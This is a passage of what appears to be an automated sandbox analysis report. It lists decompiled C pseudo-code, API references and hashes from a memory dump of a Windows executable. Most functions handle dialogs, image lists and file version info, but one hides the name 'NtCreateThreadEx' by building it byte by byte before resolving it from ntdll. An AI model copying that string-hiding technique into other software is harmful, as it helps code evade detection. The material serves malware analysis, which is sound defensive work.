                                                                                      						if(_t130 == 3) {
                                                                                      							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                      							_a4 = _t94;
                                                                                      							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                      							SendMessageW(_a4, 0x301, 0, 0);
                                                                                      							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				goto L21;
                                                                                      			}































                                                                                      0x00408ce3
                                                                                      0x00408ceb
                                                                                      0x00408cfe
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d0c
                                                                                      0x00408d21
                                                                                      0x00408d27
                                                                                      0x00408d0c
                                                                                      0x00000000
                                                                                      0x00408ca7
                                                                                      0x00408ca7
                                                                                      0x00408cad
                                                                                      0x00408d28
                                                                                      0x00408d2e
                                                                                      0x00408d35
                                                                                      0x00408d36
                                                                                      0x00408d42
                                                                                      0x00408d48
                                                                                      0x00408d4e
                                                                                      0x00408d54
                                                                                      0x00408d5a
                                                                                      0x00408d60
                                                                                      0x00408d66
                                                                                      0x00408d6c
                                                                                      0x00408d72
                                                                                      0x00408d73
                                                                                      0x00408d7f
                                                                                      0x00408d85
                                                                                      0x00408d8a
                                                                                      0x00408d8f
                                                                                      0x00408d90
                                                                                      0x00408da8
                                                                                      0x00408db9
                                                                                      0x00408dbf
                                                                                      0x00408dc5
                                                                                      0x00408dc5
                                                                                      0x00000000
                                                                                      0x00408cad
                                                                                      0x00408ca5
                                                                                      0x00408af6
                                                                                      0x00408afc
                                                                                      0x00408b07
                                                                                      0x00408b2a
                                                                                      0x00408b38
                                                                                      0x00408b53
                                                                                      0x00408b56
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408b6a
                                                                                      0x00408b2a
                                                                                      0x00408b07
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                      • {Unknown}, xrefs: 00408BA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                      • API String ID: 4111938811-1819279800
                                                                                      • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                      • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                      				int _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v16;
                                                                                      				int _v20;
                                                                                      				long _v60;
                                                                                      				char _v572;
                                                                                      				void* __esi;
                                                                                      				int _t47;
                                                                                      				void* _t50;
                                                                                      				signed short* _t76;
                                                                                      				void* _t81;
                                                                                      				void* _t84;
                                                                                      				intOrPtr* _t96;
                                                                                      				int _t97;
                                                                                      
                                                                                      				_t96 = __edi;
                                                                                      				_t97 = 0;
                                                                                      				_v20 = 0;
                                                                                      				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                      				_v8 = _t47;
                                                                                      				if(_t47 > 0) {
                                                                                      					_t50 = E00405AA7(__edi);
                                                                                      					_push(_v8);
                                                                                      					L0040B26C();
                                                                                      					_t84 = _t50;
                                                                                      					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                      					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                      						_t81 = _v12;
                                                                                      						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                      						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                      						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                      						 *__edi =  *_t13;
                                                                                      						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                      						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                      						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                      						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                      						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                      						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                      						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                      						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                      					}
                                                                                      					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                      						L5:
                                                                                      						wcscpy( &_v60, L"040904E4");
                                                                                      					} else {
                                                                                      						_t76 = _v16;
                                                                                      						_push(_t76[1] & 0x0000ffff);
                                                                                      						_push( *_t76 & 0x0000ffff);
                                                                                      						_push(L"%4.4X%4.4X");
                                                                                      						_push(0x14);
                                                                                      						_push( &_v60);
                                                                                      						L0040B1EC();
                                                                                      						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      					}
                                                                                      					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                      					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                      					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                      					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                      					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                      					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                      					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                      					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                      					_push(_t84);
                                                                                      					_t97 = 1;
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				return _t97;
                                                                                      			}


















                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                      • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                      • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                      • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                      • wcscpy.MSVCRT ref: 0040B128
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                      • API String ID: 1223191525-1542517562
                                                                                      • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                      • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 76%
                                                                                      			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                      				char _v8;
                                                                                      				char _v9;
                                                                                      				char _v10;
                                                                                      				char _v11;
                                                                                      				char _v12;
                                                                                      				char _v13;
                                                                                      				char _v14;
                                                                                      				char _v15;
                                                                                      				char _v16;
                                                                                      				char _v17;
                                                                                      				char _v18;
                                                                                      				char _v19;
                                                                                      				char _v20;
                                                                                      				char _v21;
                                                                                      				char _v22;
                                                                                      				char _v23;
                                                                                      				char _v24;
                                                                                      				struct HINSTANCE__* _t27;
                                                                                      
                                                                                      				if( *__esi != 0) {
                                                                                      					L3:
                                                                                      					return 1;
                                                                                      				}
                                                                                      				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                      				 *__esi = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosw");
                                                                                      					asm("stosb");
                                                                                      					_v24 = 0x4e;
                                                                                      					_v23 = 0x74;
                                                                                      					_v13 = 0x65;
                                                                                      					_v12 = 0x61;
                                                                                      					_v18 = 0x74;
                                                                                      					_v17 = 0x65;
                                                                                      					_v22 = 0x43;
                                                                                      					_v14 = 0x72;
                                                                                      					_v11 = 0x64;
                                                                                      					_v21 = 0x72;
                                                                                      					_v10 = 0x45;
                                                                                      					_v9 = 0x78;
                                                                                      					_v20 = 0x65;
                                                                                      					_v19 = 0x61;
                                                                                      					_v16 = 0x54;
                                                                                      					_v15 = 0x68;
                                                                                      					_v8 = 0;
                                                                                      					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                      					goto L3;
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}






















                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                      • API String ID: 2574300362-1257427173
                                                                                      • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                      • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E00407F8D(void* __eax) {
                                                                                      				struct _SHFILEINFOW _v692;
                                                                                      				void _v1214;
                                                                                      				short _v1216;
                                                                                      				void* _v1244;
                                                                                      				void* _v1248;
                                                                                      				void* _v1252;
                                                                                      				void* _v1256;
                                                                                      				void* _v1268;
                                                                                      				void* _t37;
                                                                                      				long _t38;
                                                                                      				long _t46;
                                                                                      				long _t48;
                                                                                      				long _t58;
                                                                                      				void* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      
                                                                                      				_t64 = ImageList_Create;
                                                                                      				_t62 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                      					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                      						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                      						 *(_t62 + 0x2a8) = _t48;
                                                                                      						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                      						_push( *(_t62 + 0x2a8));
                                                                                      					} else {
                                                                                      						_v692.hIcon = 0;
                                                                                      						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                      						_v1216 = 0;
                                                                                      						memset( &_v1214, 0, 0x208);
                                                                                      						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                      						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                      						 *(_t62 + 0x2a8) = _t58;
                                                                                      						_push(_t58);
                                                                                      					}
                                                                                      					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                      					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                      					 *(_t62 + 0x2ac) = _t46;
                                                                                      					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                      					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                      				}
                                                                                      				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                      				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                      				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                      				_v1244 = _t37;
                                                                                      				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                      				_t38 = GetSysColor(0xf);
                                                                                      				_v1248 = _t38;
                                                                                      				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                      				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                      				DeleteObject(_v1268);
                                                                                      				DeleteObject(_v1268);
                                                                                      				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                      			}



















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407FD0
                                                                                      • memset.MSVCRT ref: 00407FE5
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                      • LoadImageW.USER32 ref: 004080B4
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                      • LoadImageW.USER32 ref: 004080D1
                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                      • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                      • DeleteObject.GDI32(?), ref: 00408121
                                                                                      • DeleteObject.GDI32(?), ref: 00408127
                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 304928396-0
                                                                                      • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                      • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                      				int _v8;
                                                                                      				void _v518;
                                                                                      				long _v520;
                                                                                      				void _v1030;
                                                                                      				char _v1032;
                                                                                      				intOrPtr _t32;
                                                                                      				wchar_t* _t57;
                                                                                      				void* _t58;
                                                                                      				void* _t59;
                                                                                      				void* _t60;
                                                                                      
                                                                                      				_t58 = __esi;
                                                                                      				_v520 = 0;
                                                                                      				memset( &_v518, 0, 0x1fc);
                                                                                      				_v1032 = 0;
                                                                                      				memset( &_v1030, 0, 0x1fc);
                                                                                      				_t60 = _t59 + 0x18;
                                                                                      				_v8 = 1;
                                                                                      				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                      					_v8 = 0;
                                                                                      				}
                                                                                      				_t57 = _a4;
                                                                                      				 *_t57 = 0;
                                                                                      				if(_v8 != 0) {
                                                                                      					wcscpy(_t57, L"<font");
                                                                                      					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                      					if(_t32 > 0) {
                                                                                      						_push(_t32);
                                                                                      						_push(L" size=\"%d\"");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v520);
                                                                                      						L0040B1EC();
                                                                                      						wcscat(_t57,  &_v520);
                                                                                      						_t60 = _t60 + 0x18;
                                                                                      					}
                                                                                      					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                      					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                      						_push(E0040ADC0(_t33,  &_v1032));
                                                                                      						_push(L" color=\"#%s\"");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v520);
                                                                                      						L0040B1EC();
                                                                                      						wcscat(_t57,  &_v520);
                                                                                      					}
                                                                                      					wcscat(_t57, ">");
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                      					wcscat(_t57, L"<b>");
                                                                                      				}
                                                                                      				wcscat(_t57, _a8);
                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                      					wcscat(_t57, L"</b>");
                                                                                      				}
                                                                                      				if(_v8 != 0) {
                                                                                      					wcscat(_t57, L"</font>");
                                                                                      				}
                                                                                      				return _t57;
                                                                                      			}














                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 3143752011-1996832678
                                                                                      • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                      • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 97%
                                                                                      			E00403C03(void* __eflags) {
                                                                                      				void* __ebx;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t88;
                                                                                      				void* _t108;
                                                                                      				void* _t113;
                                                                                      				void* _t119;
                                                                                      				void* _t121;
                                                                                      				void* _t122;
                                                                                      				void* _t123;
                                                                                      				intOrPtr* _t124;
                                                                                      				void* _t134;
                                                                                      
                                                                                      				_t113 = _t108;
                                                                                      				E00403B3C(_t113);
                                                                                      				E00403B16(_t113);
                                                                                      				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                      				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                      				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                      				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                      				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                      				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                      				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                      				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                      				 *_t124 = 0x3ea;
                                                                                      				E0040AD85(GetDlgItem(??, ??));
                                                                                      				 *_t124 = 0x3f1;
                                                                                      				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                      				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                      				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                      				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                      				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                      				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                      				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                      				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                      				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                      				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                      				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                      				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                      				_t134 = _t124 + 0x78;
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                      				_t119 = 1;
                                                                                      				do {
                                                                                      					_t17 = _t119 + 0x280; // 0x281
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t119 = _t119 + 1;
                                                                                      				} while (_t119 <= 9);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                      				_t121 = 1;
                                                                                      				do {
                                                                                      					_t21 = _t121 + 0x294; // 0x295
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t121 = _t121 + 1;
                                                                                      				} while (_t121 <= 3);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                      				_t122 = 0;
                                                                                      				do {
                                                                                      					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t122 = _t122 + 1;
                                                                                      				} while (_t122 <= 0xd);
                                                                                      				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                      				_t123 = 0;
                                                                                      				do {
                                                                                      					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                      					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                      					_t134 = _t134 + 0xc;
                                                                                      					_t123 = _t123 + 1;
                                                                                      					_t143 = _t123 - 3;
                                                                                      				} while (_t123 < 3);
                                                                                      				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                      				E00403EC3(GetDlgItem, _t113);
                                                                                      				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                      				_t88 = E00402D78(_t113, _t143);
                                                                                      				E00402BEE(_t113);
                                                                                      				return _t88;
                                                                                      			}

















                                                                                      APIs
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                      • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                      • GetDlgItem.USER32 ref: 00403C2F
                                                                                      • SetWindowLongW.USER32 ref: 00403C39
                                                                                        • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                      • LoadImageW.USER32 ref: 00403C6A
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                      • LoadImageW.USER32 ref: 00403C7F
                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                      • GetDlgItem.USER32 ref: 00403CB0
                                                                                        • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                        • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      • GetDlgItem.USER32 ref: 00403CC2
                                                                                      • GetDlgItem.USER32 ref: 00403CD4
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • GetDlgItem.USER32 ref: 00403D64
                                                                                      • GetDlgItem.USER32 ref: 00403DC0
                                                                                      • GetDlgItem.USER32 ref: 00403DF0
                                                                                      • GetDlgItem.USER32 ref: 00403E20
                                                                                      • GetDlgItem.USER32 ref: 00403E4F
                                                                                      • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                      • GetDlgItem.USER32 ref: 00403E9B
                                                                                      • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                      Memory Dump Source
